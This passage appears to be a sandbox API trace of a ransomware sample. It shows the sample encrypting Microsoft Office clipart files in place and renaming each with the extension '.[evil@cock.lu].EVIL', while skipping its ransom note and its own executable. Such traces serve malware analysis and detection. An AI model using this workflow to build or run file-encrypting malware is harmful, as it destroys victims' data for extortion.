Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.739] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.739] __uncaught_exception () returned 0x84b1160800 [0126.739] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.739] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf.[evil@cock.lu].evil")) returned 1 [0126.740] ??_V@YAXPEAX@Z () returned 0x1 [0126.743] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF", dwFileAttributes=0x200) returned 0 [0126.743] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.743] wcsstr (_Str="HH01013_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.743] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 69 [0126.743] wcscmp (_String1="HH01013_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.743] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01013_.WMF") returned 0x0 [0126.743] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 0x45 [0126.743] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.745] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb20, lpOverlapped=0x0) returned 1 [0126.754] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.754] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.754] _errno () returned 0x84b1160840 [0126.754] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.754] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb40, lpOverlapped=0x0) returned 1 [0126.755] CloseHandle (hObject=0x1a8) returned 1 [0126.755] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.755] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.755] __uncaught_exception () returned 0x84b1160800 [0126.755] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.756] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf.[evil@cock.lu].evil")) returned 1 [0126.756] ??_V@YAXPEAX@Z () returned 0x1 [0126.760] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF", dwFileAttributes=0x200) returned 0 [0126.760] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.760] wcsstr (_Str="HH01015_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.760] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 69 [0126.760] wcscmp (_String1="HH01015_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.760] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01015_.WMF") returned 0x0 [0126.760] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 0x45 [0126.760] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.763] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x47c, lpOverlapped=0x0) returned 1 [0126.771] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.771] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.771] _errno () returned 0x84b1160840 [0126.772] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.772] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x480, lpOverlapped=0x0) returned 1 [0126.772] CloseHandle (hObject=0x1a8) returned 1 [0126.772] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.772] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.772] __uncaught_exception () returned 0x84b1160800 [0126.772] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.773] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf.[evil@cock.lu].evil")) returned 1 [0126.773] ??_V@YAXPEAX@Z () returned 0x1 [0126.777] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF", dwFileAttributes=0x200) returned 0 [0126.777] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.777] wcsstr (_Str="HH01058_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.777] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 69 [0126.777] wcscmp (_String1="HH01058_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.777] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01058_.WMF") returned 0x0 [0126.777] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 0x45 [0126.777] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.780] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xac4, lpOverlapped=0x0) returned 1 [0126.791] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.791] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.791] _errno () returned 0x84b1160840 [0126.791] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.791] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xae0, lpOverlapped=0x0) returned 1 [0126.791] CloseHandle (hObject=0x1a8) returned 1 [0126.791] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.792] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.792] __uncaught_exception () returned 0x84b1160800 [0126.792] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.792] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf.[evil@cock.lu].evil")) returned 1 [0126.793] ??_V@YAXPEAX@Z () returned 0x1 [0126.796] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF", dwFileAttributes=0x200) returned 0 [0126.797] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.797] wcsstr (_Str="HH01065_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.797] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 69 [0126.797] wcscmp (_String1="HH01065_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.797] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01065_.WMF") returned 0x0 [0126.797] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 0x45 [0126.797] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.799] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4f4, lpOverlapped=0x0) returned 1 [0126.805] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.805] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.806] _errno () returned 0x84b1160840 [0126.806] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.806] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x500, lpOverlapped=0x0) returned 1 [0126.806] CloseHandle (hObject=0x1a8) returned 1 [0126.806] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.806] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.806] __uncaught_exception () returned 0x84b1160800 [0126.806] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.807] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf.[evil@cock.lu].evil")) returned 1 [0126.807] ??_V@YAXPEAX@Z () returned 0x1 [0126.811] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF", dwFileAttributes=0x200) returned 0 [0126.811] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.811] wcsstr (_Str="HH01080_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.811] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 69 [0126.811] wcscmp (_String1="HH01080_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.811] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01080_.WMF") returned 0x0 [0126.811] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 0x45 [0126.811] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.814] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1388, lpOverlapped=0x0) returned 1 [0126.833] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.833] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.833] _errno () returned 0x84b1160840 [0126.833] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.833] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13a0, lpOverlapped=0x0) returned 1 [0126.833] CloseHandle (hObject=0x1a8) returned 1 [0126.834] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.834] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.834] __uncaught_exception () returned 0x84b1160800 [0126.834] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.834] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf.[evil@cock.lu].evil")) returned 1 [0126.835] ??_V@YAXPEAX@Z () returned 0x1 [0126.838] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF", dwFileAttributes=0x200) returned 0 [0126.839] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.839] wcsstr (_Str="HH01242_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.839] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 69 [0126.839] wcscmp (_String1="HH01242_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.839] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01242_.WMF") returned 0x0 [0126.839] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 0x45 [0126.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.843] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1cac, lpOverlapped=0x0) returned 1 [0126.853] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.854] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.854] _errno () returned 0x84b1160840 [0126.854] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.854] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1cc0, lpOverlapped=0x0) returned 1 [0126.854] CloseHandle (hObject=0x1a8) returned 1 [0126.854] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.854] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.854] __uncaught_exception () returned 0x84b1160800 [0126.855] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.855] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf.[evil@cock.lu].evil")) returned 1 [0126.856] ??_V@YAXPEAX@Z () returned 0x1 [0126.859] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF", dwFileAttributes=0x200) returned 0 [0126.859] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.859] wcsstr (_Str="HH01291_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.859] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 69 [0126.859] wcscmp (_String1="HH01291_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.859] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01291_.WMF") returned 0x0 [0126.860] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 0x45 [0126.860] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.862] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3dbe, lpOverlapped=0x0) returned 1 [0126.926] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.926] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.926] _errno () returned 0x84b1160840 [0126.926] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.926] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3dc0, lpOverlapped=0x0) returned 1 [0126.926] CloseHandle (hObject=0x1a8) returned 1 [0126.926] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.927] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.927] __uncaught_exception () returned 0x84b1160800 [0126.927] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.927] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf.[evil@cock.lu].evil")) returned 1 [0126.928] ??_V@YAXPEAX@Z () returned 0x1 [0126.931] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF", dwFileAttributes=0x200) returned 0 [0126.931] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.931] wcsstr (_Str="HH01329_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.931] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 69 [0126.932] wcscmp (_String1="HH01329_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.932] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01329_.WMF") returned 0x0 [0126.932] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 0x45 [0126.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.934] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1780, lpOverlapped=0x0) returned 1 [0126.939] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.939] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.939] _errno () returned 0x84b1160840 [0126.939] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.939] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x17a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17a0, lpOverlapped=0x0) returned 1 [0126.939] CloseHandle (hObject=0x1a8) returned 1 [0126.939] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.940] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.940] __uncaught_exception () returned 0x84b1160800 [0126.940] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.940] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft 